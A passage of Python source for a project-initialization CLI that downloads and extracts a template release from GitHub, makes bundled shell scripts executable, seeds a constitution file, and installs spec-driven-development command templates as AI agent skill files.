            "GET",
            download_url,
            timeout=60,
            follow_redirects=True,
            headers=_github_auth_headers(github_token),
        ) as response:
            if response.status_code != 200:
                # Handle rate-limiting on download as well
                error_msg = _format_rate_limit_error(response.status_code, response.headers, download_url)
                if debug:
                    error_msg += f"\n\n[dim]Response body (truncated 400):[/dim]\n{response.text[:400]}"
                raise RuntimeError(error_msg)
            total_size = int(response.headers.get('content-length', 0))
            with open(zip_path, 'wb') as f:
                if total_size == 0:
                    for chunk in response.iter_bytes(chunk_size=8192):
                        f.write(chunk)
                else:
                    if show_progress:
                        with Progress(
                            SpinnerColumn(),
                            TextColumn("[progress.description]{task.description}"),
                            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
                            console=console,
                        ) as progress:
                            task = progress.add_task("Downloading...", total=total_size)
                            downloaded = 0
                            for chunk in response.iter_bytes(chunk_size=8192):
                                f.write(chunk)
                                downloaded += len(chunk)
                                progress.update(task, completed=downloaded)
                    else:
                        for chunk in response.iter_bytes(chunk_size=8192):
                            f.write(chunk)
    except Exception as e:
        console.print("[red]Error downloading template[/red]")
        detail = str(e)
        if zip_path.exists():
            # Never leave a partial/corrupt archive behind.
            zip_path.unlink()
        console.print(Panel(detail, title="Download Error", border_style="red"))
        raise typer.Exit(1)
    if verbose:
        # Fix: previously printed a literal "(unknown)" placeholder.
        console.print(f"Downloaded: {filename}")
    metadata = {
        "filename": filename,
        "size": file_size,
        "release": release_data["tag_name"],
        "asset_url": download_url
    }
    return zip_path, metadata
def download_and_extract_template(project_path: Path, ai_assistant: str, script_type: str, is_current_dir: bool = False, *, verbose: bool = True, tracker: StepTracker | None = None, client: httpx.Client = None, debug: bool = False, github_token: str = None) -> Path:
    """Download the template ZIP and extract it into *project_path*.

    Args:
        project_path: Target directory for the project files.
        ai_assistant: Agent identifier passed to the downloader.
        script_type: "sh" or "ps" template variant.
        is_current_dir: True when initializing in the existing cwd; extraction
            then merges into the directory instead of creating it.
        verbose: Console output (suppressed when a tracker is active).
        tracker: Optional StepTracker for structured progress reporting.
        client/debug/github_token: Forwarded to download_template_from_github.

    Returns:
        project_path (for chaining).

    Edge cases:
        - ZIPs wrapping everything in a single top-level directory are
          flattened; in-place via a temp dir when merging into the cwd,
          otherwise via a sibling "<name>_temp" rename dance.
        - When merging into an existing directory, files are copied
          individually (overwriting), except .vscode/settings.json which is
          merged politely via handle_vscode_settings.
        - On extraction failure, a freshly created project directory is
          removed; the cwd is never deleted.
        - The downloaded archive is always removed in the finally block,
          even on failure.
    """
    current_dir = Path.cwd()
    if tracker:
        tracker.start("fetch", "contacting GitHub API")
    try:
        zip_path, meta = download_template_from_github(
            ai_assistant,
            current_dir,
            script_type=script_type,
            verbose=verbose and tracker is None,
            show_progress=(tracker is None),
            client=client,
            debug=debug,
            github_token=github_token
        )
        if tracker:
            tracker.complete("fetch", f"release {meta['release']} ({meta['size']:,} bytes)")
            tracker.add("download", "Download template")
            tracker.complete("download", meta['filename'])
    except Exception as e:
        if tracker:
            tracker.error("fetch", str(e))
        else:
            if verbose:
                console.print(f"[red]Error downloading template:[/red] {e}")
        raise
    if tracker:
        tracker.add("extract", "Extract template")
        tracker.start("extract")
    elif verbose:
        console.print("Extracting template...")
    try:
        if not is_current_dir:
            # Intentionally fails (FileExistsError) if the directory already
            # exists; callers are expected to have validated this.
            project_path.mkdir(parents=True)
        with zipfile.ZipFile(zip_path, 'r') as zip_ref:
            zip_contents = zip_ref.namelist()
            if tracker:
                tracker.start("zip-list")
                tracker.complete("zip-list", f"{len(zip_contents)} entries")
            elif verbose:
                console.print(f"[cyan]ZIP contains {len(zip_contents)} items[/cyan]")
            if is_current_dir:
                with tempfile.TemporaryDirectory() as temp_dir:
                    temp_path = Path(temp_dir)
                    zip_ref.extractall(temp_path)
                    extracted_items = list(temp_path.iterdir())
                    if tracker:
                        tracker.start("extracted-summary")
                        tracker.complete("extracted-summary", f"temp {len(extracted_items)} items")
                    elif verbose:
                        console.print(f"[cyan]Extracted {len(extracted_items)} items to temp location[/cyan]")
                    source_dir = temp_path
                    if len(extracted_items) == 1 and extracted_items[0].is_dir():
                        source_dir = extracted_items[0]
                        if tracker:
                            tracker.add("flatten", "Flatten nested directory")
                            tracker.complete("flatten")
                        elif verbose:
                            console.print("[cyan]Found nested directory structure[/cyan]")
                    for item in source_dir.iterdir():
                        dest_path = project_path / item.name
                        if item.is_dir():
                            if dest_path.exists():
                                if verbose and not tracker:
                                    console.print(f"[yellow]Merging directory:[/yellow] {item.name}")
                                for sub_item in item.rglob('*'):
                                    if sub_item.is_file():
                                        rel_path = sub_item.relative_to(item)
                                        dest_file = dest_path / rel_path
                                        dest_file.parent.mkdir(parents=True, exist_ok=True)
                                        # Special handling for .vscode/settings.json - merge instead of overwrite
                                        if dest_file.name == "settings.json" and dest_file.parent.name == ".vscode":
                                            handle_vscode_settings(sub_item, dest_file, rel_path, verbose, tracker)
                                        else:
                                            shutil.copy2(sub_item, dest_file)
                            else:
                                shutil.copytree(item, dest_path)
                        else:
                            if dest_path.exists() and verbose and not tracker:
                                console.print(f"[yellow]Overwriting file:[/yellow] {item.name}")
                            shutil.copy2(item, dest_path)
                    if verbose and not tracker:
                        console.print("[cyan]Template files merged into current directory[/cyan]")
            else:
                zip_ref.extractall(project_path)
                extracted_items = list(project_path.iterdir())
                if tracker:
                    tracker.start("extracted-summary")
                    tracker.complete("extracted-summary", f"{len(extracted_items)} top-level items")
                elif verbose:
                    console.print(f"[cyan]Extracted {len(extracted_items)} items to {project_path}:[/cyan]")
                    for item in extracted_items:
                        console.print(f"  - {item.name} ({'dir' if item.is_dir() else 'file'})")
                if len(extracted_items) == 1 and extracted_items[0].is_dir():
                    # Flatten: move the nested dir aside, drop the (now empty)
                    # project dir, then rename the nested dir into place.
                    nested_dir = extracted_items[0]
                    temp_move_dir = project_path.parent / f"{project_path.name}_temp"
                    shutil.move(str(nested_dir), str(temp_move_dir))
                    project_path.rmdir()
                    shutil.move(str(temp_move_dir), str(project_path))
                    if tracker:
                        tracker.add("flatten", "Flatten nested directory")
                        tracker.complete("flatten")
                    elif verbose:
                        console.print("[cyan]Flattened nested directory structure[/cyan]")
    except Exception as e:
        if tracker:
            tracker.error("extract", str(e))
        else:
            if verbose:
                console.print(f"[red]Error extracting template:[/red] {e}")
                if debug:
                    console.print(Panel(str(e), title="Extraction Error", border_style="red"))
        if not is_current_dir and project_path.exists():
            shutil.rmtree(project_path)
        raise typer.Exit(1)
    else:
        if tracker:
            tracker.complete("extract")
    finally:
        if tracker:
            tracker.add("cleanup", "Remove temporary archive")
        if zip_path.exists():
            zip_path.unlink()
            if tracker:
                tracker.complete("cleanup")
            elif verbose:
                console.print(f"Cleaned up: {zip_path.name}")
    return project_path
def ensure_executable_scripts(project_path: Path, tracker: StepTracker | None = None) -> None:
    """Make extracted .sh scripts under .specify/scripts executable (POSIX).

    Args:
        project_path: Project root containing .specify/scripts.
        tracker: Optional StepTracker used for structured reporting instead
            of console output.

    Edge cases:
        - On Windows (os.name == "nt") this is a silent no-op.
        - A missing scripts directory is a silent no-op.
        - Symlinks and non-regular files are skipped.
        - Files whose first two bytes are not "#!" (no shebang) are skipped,
          as are files that already have any execute bit set.
        - Execute bits are derived from read bits (owner r -> owner x, group
          r -> group x, other r -> other x); owner-exec is always forced so
          the result is at least runnable by the owner.
        - Per-file failures are collected and reported, never raised.
    """
    if os.name == "nt":
        return  # Windows: skip silently
    scripts_root = project_path / ".specify" / "scripts"
    if not scripts_root.is_dir():
        return
    failures: list[str] = []
    updated = 0
    for script in scripts_root.rglob("*.sh"):
        try:
            if script.is_symlink() or not script.is_file():
                continue
            try:
                with script.open("rb") as f:
                    if f.read(2) != b"#!":
                        continue
            except Exception:
                continue
            st = script.stat()
            mode = st.st_mode
            if mode & 0o111:
                continue
            new_mode = mode
            if mode & 0o400:
                new_mode |= 0o100
            if mode & 0o040:
                new_mode |= 0o010
            if mode & 0o004:
                new_mode |= 0o001
            if not (new_mode & 0o100):
                new_mode |= 0o100
            os.chmod(script, new_mode)
            updated += 1
        except Exception as e:
            failures.append(f"{script.relative_to(scripts_root)}: {e}")
    if tracker:
        detail = f"{updated} updated" + (f", {len(failures)} failed" if failures else "")
        tracker.add("chmod", "Set script permissions recursively")
        (tracker.error if failures else tracker.complete)("chmod", detail)
    else:
        if updated:
            console.print(f"[cyan]Updated execute permissions on {updated} script(s) recursively[/cyan]")
        if failures:
            console.print("[yellow]Some scripts could not be updated:[/yellow]")
            for f in failures:
                console.print(f"  - {f}")
def ensure_constitution_from_template(project_path: Path, tracker: StepTracker | None = None) -> None:
    """Seed .specify/memory/constitution.md from the bundled template.

    Args:
        project_path: Project root containing the .specify directory.
        tracker: Optional StepTracker for structured status reporting.

    Edge cases:
        - An existing constitution is never overwritten (user content wins);
          the step is reported as skipped.
        - A missing template indicates a broken extraction and is reported
          as an error rather than raised.
        - Copy failures are reported (tracker error or console warning) but
          never propagate — this step is best-effort.
    """
    memory_constitution = project_path / ".specify" / "memory" / "constitution.md"
    template_constitution = project_path / ".specify" / "templates" / "constitution-template.md"
    # If constitution already exists in memory, preserve it
    if memory_constitution.exists():
        if tracker:
            tracker.add("constitution", "Constitution setup")
            tracker.skip("constitution", "existing file preserved")
        return
    # If template doesn't exist, something went wrong with extraction
    if not template_constitution.exists():
        if tracker:
            tracker.add("constitution", "Constitution setup")
            tracker.error("constitution", "template not found")
        return
    # Copy template to memory directory
    try:
        memory_constitution.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(template_constitution, memory_constitution)
        if tracker:
            tracker.add("constitution", "Constitution setup")
            tracker.complete("constitution", "copied from template")
        else:
            console.print("[cyan]Initialized constitution from template[/cyan]")
    except Exception as e:
        if tracker:
            tracker.add("constitution", "Constitution setup")
            tracker.error("constitution", str(e))
        else:
            console.print(f"[yellow]Warning: Could not initialize constitution: {e}[/yellow]")
# Project-relative path where `specify init` records the options it was run with.
INIT_OPTIONS_FILE = ".specify/init-options.json"


def save_init_options(project_path: Path, options: dict[str, Any]) -> None:
    """Persist the init-time options to .specify/init-options.json.

    Parent directories are created as needed; keys are sorted so the file
    is stable across runs (diff-friendly).
    """
    dest = project_path / INIT_OPTIONS_FILE
    dest.parent.mkdir(parents=True, exist_ok=True)
    # Explicit UTF-8: Path.write_text defaults to the locale encoding, which
    # on Windows (e.g. cp1252) can fail or corrupt non-ASCII option values.
    dest.write_text(json.dumps(options, indent=2, sort_keys=True), encoding="utf-8")


def load_init_options(project_path: Path) -> dict[str, Any]:
    """Load previously saved init options for *project_path*.

    Edge cases: a missing, unreadable, corrupt, or mis-encoded file yields
    {} — callers never have to handle exceptions here. ValueError covers
    both JSONDecodeError and UnicodeDecodeError.
    """
    path = project_path / INIT_OPTIONS_FILE
    if not path.exists():
        return {}
    try:
        return json.loads(path.read_text(encoding="utf-8"))
    except (ValueError, OSError):
        return {}
# Agent-specific skill directory overrides for agents whose skills directory
# doesn't follow the standard <agent_folder>/skills/ pattern
AGENT_SKILLS_DIR_OVERRIDES = {
    "codex": ".agents/skills",  # Codex agent layout override
}
# Default skills directory for agents not in AGENT_CONFIG
# (also used when an agent has no "folder" configured).
DEFAULT_SKILLS_DIR = ".agents/skills"
# Enhanced descriptions for each spec-kit command skill.
# Keys must match the command name AFTER the "speckit." prefix (and any
# ".agent" suffix) is stripped — see install_ai_skills normalization.
SKILL_DESCRIPTIONS = {
    "specify": "Create or update feature specifications from natural language descriptions. Use when starting new features or refining requirements. Generates spec.md with user stories, functional requirements, and acceptance criteria following spec-driven development methodology.",
    "plan": "Generate technical implementation plans from feature specifications. Use after creating a spec to define architecture, tech stack, and implementation phases. Creates plan.md with detailed technical design.",
    "tasks": "Break down implementation plans into actionable task lists. Use after planning to create a structured task breakdown. Generates tasks.md with ordered, dependency-aware tasks.",
    "implement": "Execute all tasks from the task breakdown to build the feature. Use after task generation to systematically implement the planned solution following TDD approach where applicable.",
    "analyze": "Perform cross-artifact consistency analysis across spec.md, plan.md, and tasks.md. Use after task generation to identify gaps, duplications, and inconsistencies before implementation.",
    "clarify": "Structured clarification workflow for underspecified requirements. Use before planning to resolve ambiguities through coverage-based questioning. Records answers in spec clarifications section.",
    "constitution": "Create or update project governing principles and development guidelines. Use at project start to establish code quality, testing standards, and architectural constraints that guide all development.",
    "checklist": "Generate custom quality checklists for validating requirements completeness and clarity. Use to create unit tests for English that ensure spec quality before implementation.",
    "taskstoissues": "Convert tasks from tasks.md into GitHub issues. Use after task breakdown to track work items in GitHub project management.",
}
def _get_skills_dir(project_path: Path, selected_ai: str) -> Path:
    """Resolve the skills install directory for *selected_ai*.

    Resolution order: explicit override table, then the agent's configured
    folder with "/skills" appended, then the generic default directory.
    """
    override = AGENT_SKILLS_DIR_OVERRIDES.get(selected_ai)
    if override is not None:
        return project_path / override
    configured_folder = AGENT_CONFIG.get(selected_ai, {}).get("folder", "")
    if not configured_folder:
        return project_path / DEFAULT_SKILLS_DIR
    return project_path / configured_folder.rstrip("/") / "skills"
def install_ai_skills(project_path: Path, selected_ai: str, tracker: StepTracker | None = None) -> bool:
    """Convert extracted speckit command templates into agent skill packages.

    Args:
        project_path: Project root containing extracted agent command files.
        selected_ai: Agent identifier (keys AGENT_CONFIG / overrides).
        tracker: Optional StepTracker for structured progress reporting.

    Returns:
        True when at least one skill was installed or already present.

    Edge cases:
        - Only speckit.*.md templates are considered, so user-authored
          command files in the same directory are never converted.
        - If the extracted commands are missing (or in a non-.md format,
          e.g. .toml agents), falls back to the source-checkout
          templates/commands directory.
        - Malformed frontmatter (opening --- without a closing ---) is
          tolerated: the whole file body is used and a warning printed.
        - Existing SKILL.md files are never overwritten on re-runs
          (user customizations are preserved and counted as skipped).
        - Per-file failures are warned about and skipped, never raised.
        - Kimi uses a dot-separated skill name (speckit.<cmd>) to match its
          /skill:<name> discovery; everything else uses speckit-<cmd>.
    """
    # Locate command templates in the agent's extracted commands directory.
    # download_and_extract_template() already placed the .md files here.
    agent_config = AGENT_CONFIG.get(selected_ai, {})
    agent_folder = agent_config.get("folder", "")
    commands_subdir = agent_config.get("commands_subdir", "commands")
    if agent_folder:
        templates_dir = project_path / agent_folder.rstrip("/") / commands_subdir
    else:
        templates_dir = project_path / commands_subdir
    # Only consider speckit.*.md templates so that user-authored command
    # files (e.g. custom slash commands, agent files) coexisting in the
    # same commands directory are not incorrectly converted into skills.
    template_glob = "speckit.*.md"
    if not templates_dir.exists() or not any(templates_dir.glob(template_glob)):
        # Fallback: try the repo-relative path (for running from source checkout)
        # This also covers agents whose extracted commands are in a different
        # format (e.g. gemini/tabnine use .toml, not .md).
        script_dir = Path(__file__).parent.parent.parent  # up from src/specify_cli/
        fallback_dir = script_dir / "templates" / "commands"
        if fallback_dir.exists() and any(fallback_dir.glob("*.md")):
            templates_dir = fallback_dir
            template_glob = "*.md"
    if not templates_dir.exists() or not any(templates_dir.glob(template_glob)):
        if tracker:
            tracker.error("ai-skills", "command templates not found")
        else:
            console.print("[yellow]Warning: command templates not found, skipping skills installation[/yellow]")
        return False
    command_files = sorted(templates_dir.glob(template_glob))
    if not command_files:
        if tracker:
            tracker.skip("ai-skills", "no command templates found")
        else:
            console.print("[yellow]No command templates found to install[/yellow]")
        return False
    # Resolve the correct skills directory for this agent
    skills_dir = _get_skills_dir(project_path, selected_ai)
    skills_dir.mkdir(parents=True, exist_ok=True)
    if tracker:
        tracker.start("ai-skills")
    installed_count = 0
    skipped_count = 0
    for command_file in command_files:
        try:
            content = command_file.read_text(encoding="utf-8")
            # Parse YAML frontmatter
            if content.startswith("---"):
                parts = content.split("---", 2)
                if len(parts) >= 3:
                    frontmatter = yaml.safe_load(parts[1])
                    if not isinstance(frontmatter, dict):
                        frontmatter = {}
                    body = parts[2].strip()
                else:
                    # File starts with --- but has no closing ---
                    console.print(f"[yellow]Warning: {command_file.name} has malformed frontmatter (no closing ---), treating as plain content[/yellow]")
                    frontmatter = {}
                    body = content
            else:
                frontmatter = {}
                body = content
            command_name = command_file.stem
            # Normalize: extracted commands may be named "speckit.<cmd>.md"
            # or "speckit.<cmd>.agent.md"; strip the "speckit." prefix and
            # any trailing ".agent" suffix so skill names stay clean and
            # SKILL_DESCRIPTIONS lookups work.
            if command_name.startswith("speckit."):
                command_name = command_name[len("speckit."):]
            if command_name.endswith(".agent"):
                command_name = command_name[:-len(".agent")]
            # Kimi CLI discovers skills by directory name and invokes them as
            # /skill:<name> — use dot separator to match packaging convention.
            if selected_ai == "kimi":
                skill_name = f"speckit.{command_name}"
            else:
                skill_name = f"speckit-{command_name}"
            # Create skill directory (additive — never removes existing content)
            skill_dir = skills_dir / skill_name
            skill_dir.mkdir(parents=True, exist_ok=True)
            # Select the best description available
            original_desc = frontmatter.get("description", "")
            enhanced_desc = SKILL_DESCRIPTIONS.get(command_name, original_desc or f"Spec-kit workflow command: {command_name}")
            # Build SKILL.md following agentskills.io spec
            # Use yaml.safe_dump to safely serialise the frontmatter and
            # avoid YAML injection from descriptions containing colons,
            # quotes, or newlines.
            # Normalize source filename for metadata — strip speckit. prefix
            # so it matches the canonical templates/commands/<cmd>.md path.
            source_name = command_file.name
            if source_name.startswith("speckit."):
                source_name = source_name[len("speckit."):]
            if source_name.endswith(".agent.md"):
                source_name = source_name[:-len(".agent.md")] + ".md"
            frontmatter_data = {
                "name": skill_name,
                "description": enhanced_desc,
                "compatibility": "Requires spec-kit project structure with .specify/ directory",
                "metadata": {
                    "author": "github-spec-kit",
                    "source": f"templates/commands/{source_name}",
                },
            }
            frontmatter_text = yaml.safe_dump(frontmatter_data, sort_keys=False).strip()
            skill_content = (
                f"---\n"
                f"{frontmatter_text}\n"
                f"---\n\n"
                f"# Speckit {command_name.title()} Skill\n\n"
                f"{body}\n"
            )
            skill_file = skill_dir / "SKILL.md"
            if skill_file.exists():
                # Do not overwrite user-customized skills on re-runs
                skipped_count += 1
                continue
            skill_file.write_text(skill_content, encoding="utf-8")
            installed_count += 1
        except Exception as e:
            console.print(f"[yellow]Warning: Failed to install skill {command_file.stem}: {e}[/yellow]")
            continue
    if tracker:
        if installed_count > 0 and skipped_count > 0:
            tracker.complete("ai-skills", f"{installed_count} new + {skipped_count} existing skills in {skills_dir.relative_to(project_path)}")
        elif installed_count > 0:
            tracker.complete("ai-skills", f"{installed_count} skills → {skills_dir.relative_to(project_path)}")
        elif skipped_count > 0:
            tracker.complete("ai-skills", f"{skipped_count} skills already present")
        else:
            tracker.error("ai-skills", "no skills installed")
    else:
        if installed_count > 0:
            console.print(f"[green]✓[/green] Installed {installed_count} agent skills to {skills_dir.relative_to(project_path)}/")
        elif skipped_count > 0:
            console.print(f"[green]✓[/green] {skipped_count} agent skills already present in {skills_dir.relative_to(project_path)}/")
        else:
            console.print("[yellow]No skills were installed[/yellow]")
    return installed_count > 0 or skipped_count > 0
def _handle_agy_deprecation(console: Console) -> None:
    """Print the Antigravity explicit-command deprecation notice and exit.

    Always raises typer.Exit(1); callers must not expect a return. Note the
    *console* parameter shadows the module-level console by design.
    """
    console.print("\n[red]Error:[/red] Explicit command support was deprecated in Antigravity version 1.20.5.")
    console.print("Please use [cyan]--ai-skills[/cyan] when initializing to install templates as agent skills instead.")
    console.print("[yellow]Usage:[/yellow] specify init <project> --ai agy --ai-skills")
    raise typer.Exit(1)
@app.command()
def init(
    project_name: str = typer.Argument(None, help="Name for your new project directory (optional if using --here, or use '.' for current directory)"),
    ai_assistant: str = typer.Option(None, "--ai", help=AI_ASSISTANT_HELP),
    ai_commands_dir: str = typer.Option(None, "--ai-commands-dir", help="Directory for agent command files (required with --ai generic, e.g. .myagent/commands/)"),
    script_type: str = typer.Option(None, "--script", help="Script type to use: sh or ps"),
    ignore_agent_tools: bool = typer.Option(False, "--ignore-agent-tools", help="Skip checks for AI agent tools like Claude Code"),
    no_git: bool = typer.Option(False, "--no-git", help="Skip git repository initialization"),
    here: bool = typer.Option(False, "--here", help="Initialize project in the current directory instead of creating a new one"),
    force: bool = typer.Option(False, "--force", help="Force merge/overwrite when using --here (skip confirmation)"),
    skip_tls: bool = typer.Option(False, "--skip-tls", help="Skip SSL/TLS verification (not recommended)"),
    debug: bool = typer.Option(False, "--debug", help="Show verbose diagnostic output for network and extraction failures"),
    github_token: str = typer.Option(None, "--github-token", help="GitHub token to use for API requests (or set GH_TOKEN or GITHUB_TOKEN environment variable)"),
    ai_skills: bool = typer.Option(False, "--ai-skills", help="Install Prompt.MD templates as agent skills (requires --ai)"),
    preset: str = typer.Option(None, "--preset", help="Install a preset during initialization (by preset ID)"),
):
    """Initialize a new Specify project from the latest template release.

    Edge cases handled:

    - ``project_name == "."`` is shorthand for ``--here`` (the name is
      cleared and the current directory is used). Supplying both an
      explicit name and ``--here`` is an error, as is supplying neither.
    - Option values that themselves look like flags (start with ``--``)
      are rejected early — they indicate a missing value / argument
      ordering mistake on the command line.
    - ``--ai-skills`` without ``--ai`` is an error.
    - With ``--here`` into a non-empty directory, the user must confirm
      the merge unless ``--force`` is given; without ``--here``, an
      already-existing target directory always aborts.
    - An explicit ``--ai agy`` without ``--ai-skills`` aborts via
      ``_handle_agy_deprecation``; selecting agy *interactively* instead
      auto-enables ``ai_skills`` with a printed note.
    - ``--ai generic`` requires ``--ai-commands-dir``; that option is
      rejected for any other agent.
    - On any exception inside the tracked setup phase, a freshly created
      project directory is removed — but never the current directory in
      ``--here`` mode.
    - Preset installation failures are downgraded to warnings so a
      bad/missing preset never fails an otherwise successful init.
    """
    show_banner()
    # Detect when option values are likely misinterpreted flags (parameter ordering issue)
    if ai_assistant and ai_assistant.startswith("--"):
        console.print(f"[red]Error:[/red] Invalid value for --ai: '{ai_assistant}'")
        console.print("[yellow]Hint:[/yellow] Did you forget to provide a value for --ai?")
        console.print("[yellow]Example:[/yellow] specify init --ai claude --here")
        console.print(f"[yellow]Available agents:[/yellow] {', '.join(AGENT_CONFIG.keys())}")
        raise typer.Exit(1)
    if ai_commands_dir and ai_commands_dir.startswith("--"):
        console.print(f"[red]Error:[/red] Invalid value for --ai-commands-dir: '{ai_commands_dir}'")
        console.print("[yellow]Hint:[/yellow] Did you forget to provide a value for --ai-commands-dir?")
        console.print("[yellow]Example:[/yellow] specify init --ai generic --ai-commands-dir .myagent/commands/")
        raise typer.Exit(1)
    # Map user-facing aliases (e.g. shorthand agent names) to canonical keys.
    if ai_assistant:
        ai_assistant = AI_ASSISTANT_ALIASES.get(ai_assistant, ai_assistant)
    if project_name == ".":
        here = True
        project_name = None # Clear project_name to use existing validation logic
    if here and project_name:
        console.print("[red]Error:[/red] Cannot specify both project name and --here flag")
        raise typer.Exit(1)
    if not here and not project_name:
        console.print("[red]Error:[/red] Must specify either a project name, use '.' for current directory, or use --here flag")
        raise typer.Exit(1)
    if ai_skills and not ai_assistant:
        console.print("[red]Error:[/red] --ai-skills requires --ai to be specified")
        console.print("[yellow]Usage:[/yellow] specify init <project> --ai <agent> --ai-skills")
        raise typer.Exit(1)
    if here:
        project_name = Path.cwd().name
        project_path = Path.cwd()
        existing_items = list(project_path.iterdir())
        if existing_items:
            console.print(f"[yellow]Warning:[/yellow] Current directory is not empty ({len(existing_items)} items)")
            console.print("[yellow]Template files will be merged with existing content and may overwrite existing files[/yellow]")
            if force:
                console.print("[cyan]--force supplied: skipping confirmation and proceeding with merge[/cyan]")
            else:
                response = typer.confirm("Do you want to continue?")
                if not response:
                    console.print("[yellow]Operation cancelled[/yellow]")
                    raise typer.Exit(0)
    else:
        project_path = Path(project_name).resolve()
        if project_path.exists():
            error_panel = Panel(
                f"Directory '[cyan]{project_name}[/cyan]' already exists\n"
                "Please choose a different project name or remove the existing directory.",
                title="[red]Directory Conflict[/red]",
                border_style="red",
                padding=(1, 2)
            )
            console.print()
            console.print(error_panel)
            raise typer.Exit(1)
    if ai_assistant:
        if ai_assistant not in AGENT_CONFIG:
            console.print(f"[red]Error:[/red] Invalid AI assistant '{ai_assistant}'. Choose from: {', '.join(AGENT_CONFIG.keys())}")
            raise typer.Exit(1)
        selected_ai = ai_assistant
    else:
        # Create options dict for selection (agent_key: display_name)
        ai_choices = {key: config["name"] for key, config in AGENT_CONFIG.items()}
        selected_ai = select_with_arrows(
            ai_choices,
            "Choose your AI assistant:",
            "copilot"
        )
    # [DEPRECATION NOTICE: Antigravity (agy)]
    # As of Antigravity v1.20.5, traditional CLI "command" support was fully removed
    # in favor of "Agent Skills" (SKILL.md files under <agent_folder>/skills/<skill_name>/).
    # Because 'specify_cli' historically populated .agent/commands/, we now must explicitly
    # enforce the `--ai-skills` flag for `agy` to ensure valid template generation.
    if selected_ai == "agy" and not ai_skills:
        # If agy was selected interactively (no --ai provided), automatically enable
        # ai_skills so the agent remains usable without requiring an extra flag.
        # Preserve deprecation behavior only for explicit '--ai agy' without skills.
        if ai_assistant:
            _handle_agy_deprecation(console)
        else:
            ai_skills = True
            console.print(
                "\n[yellow]Note:[/yellow] 'agy' was selected interactively; "
                "enabling [cyan]--ai-skills[/cyan] automatically for compatibility "
                "(explicit .agent/commands usage is deprecated)."
            )
    # Validate --ai-commands-dir usage
    if selected_ai == "generic":
        if not ai_commands_dir:
            console.print("[red]Error:[/red] --ai-commands-dir is required when using --ai generic")
            console.print("[dim]Example: specify init my-project --ai generic --ai-commands-dir .myagent/commands/[/dim]")
            raise typer.Exit(1)
    elif ai_commands_dir:
        console.print(f"[red]Error:[/red] --ai-commands-dir can only be used with --ai generic (not '{selected_ai}')")
        raise typer.Exit(1)
    current_dir = Path.cwd()
    setup_lines = [
        "[cyan]Specify Project Setup[/cyan]",
        "",
        f"{'Project':<15} [green]{project_path.name}[/green]",
        f"{'Working Path':<15} [dim]{current_dir}[/dim]",
    ]
    if not here:
        setup_lines.append(f"{'Target Path':<15} [dim]{project_path}[/dim]")
    console.print(Panel("\n".join(setup_lines), border_style="cyan", padding=(1, 2)))
    # Git is optional: absence only skips repo initialization, never aborts.
    should_init_git = False
    if not no_git:
        should_init_git = check_tool("git")
        if not should_init_git:
            console.print("[yellow]Git not found - will skip repository initialization[/yellow]")
    if not ignore_agent_tools:
        agent_config = AGENT_CONFIG.get(selected_ai)
        if agent_config and agent_config["requires_cli"]:
            install_url = agent_config["install_url"]
            if not check_tool(selected_ai):
                error_panel = Panel(
                    f"[cyan]{selected_ai}[/cyan] not found\n"
                    f"Install from: [cyan]{install_url}[/cyan]\n"
                    f"{agent_config['name']} is required to continue with this project type.\n\n"
                    "Tip: Use [cyan]--ignore-agent-tools[/cyan] to skip this check",
                    title="[red]Agent Detection Error[/red]",
                    border_style="red",
                    padding=(1, 2)
                )
                console.print()
                console.print(error_panel)
                raise typer.Exit(1)
    if script_type:
        if script_type not in SCRIPT_TYPE_CHOICES:
            console.print(f"[red]Error:[/red] Invalid script type '{script_type}'. Choose from: {', '.join(SCRIPT_TYPE_CHOICES.keys())}")
            raise typer.Exit(1)
        selected_script = script_type
    else:
        # Edge case: non-interactive stdin (piped/CI) falls back to the
        # platform default instead of prompting.
        default_script = "ps" if os.name == "nt" else "sh"
        if sys.stdin.isatty():
            selected_script = select_with_arrows(SCRIPT_TYPE_CHOICES, "Choose script type (or press Enter)", default_script)
        else:
            selected_script = default_script
    console.print(f"[cyan]Selected AI assistant:[/cyan] {selected_ai}")
    console.print(f"[cyan]Selected script type:[/cyan] {selected_script}")
    tracker = StepTracker("Initialize Specify Project")
    sys._specify_tracker_active = True
    tracker.add("precheck", "Check required tools")
    tracker.complete("precheck", "ok")
    tracker.add("ai-select", "Select AI assistant")
    tracker.complete("ai-select", f"{selected_ai}")
    tracker.add("script-select", "Select script type")
    tracker.complete("script-select", selected_script)
    for key, label in [
        ("fetch", "Fetch latest release"),
        ("download", "Download template"),
        ("extract", "Extract template"),
        ("zip-list", "Archive contents"),
        ("extracted-summary", "Extraction summary"),
        ("chmod", "Ensure scripts executable"),
        ("constitution", "Constitution setup"),
    ]:
        tracker.add(key, label)
    if ai_skills:
        tracker.add("ai-skills", "Install agent skills")
    for key, label in [
        ("cleanup", "Cleanup"),
        ("git", "Initialize git repository"),
        ("final", "Finalize")
    ]:
        tracker.add(key, label)
    # Track git error message outside Live context so it persists
    git_error_message = None
    with Live(tracker.render(), console=console, refresh_per_second=8, transient=True) as live:
        tracker.attach_refresh(lambda: live.update(tracker.render()))
        try:
            verify = not skip_tls
            local_ssl_context = ssl_context if verify else False
            local_client = httpx.Client(verify=local_ssl_context)
            download_and_extract_template(project_path, selected_ai, selected_script, here, verbose=False, tracker=tracker, client=local_client, debug=debug, github_token=github_token)
            # For generic agent, rename placeholder directory to user-specified path
            if selected_ai == "generic" and ai_commands_dir:
                placeholder_dir = project_path / ".speckit" / "commands"
                target_dir = project_path / ai_commands_dir
                if placeholder_dir.is_dir():
                    target_dir.parent.mkdir(parents=True, exist_ok=True)
                    shutil.move(str(placeholder_dir), str(target_dir))
                    # Clean up empty .speckit dir if it's now empty
                    speckit_dir = project_path / ".speckit"
                    if speckit_dir.is_dir() and not any(speckit_dir.iterdir()):
                        speckit_dir.rmdir()
            ensure_executable_scripts(project_path, tracker=tracker)
            ensure_constitution_from_template(project_path, tracker=tracker)
            if ai_skills:
                skills_ok = install_ai_skills(project_path, selected_ai, tracker=tracker)
                # When --ai-skills is used on a NEW project and skills were
                # successfully installed, remove the command files that the
                # template archive just created. Skills replace commands, so
                # keeping both would be confusing. For --here on an existing
                # repo we leave pre-existing commands untouched to avoid a
                # breaking change. We only delete AFTER skills succeed so the
                # project always has at least one of {commands, skills}.
                if skills_ok and not here:
                    agent_cfg = AGENT_CONFIG.get(selected_ai, {})
                    agent_folder = agent_cfg.get("folder", "")
                    commands_subdir = agent_cfg.get("commands_subdir", "commands")
                    if agent_folder:
                        cmds_dir = project_path / agent_folder.rstrip("/") / commands_subdir
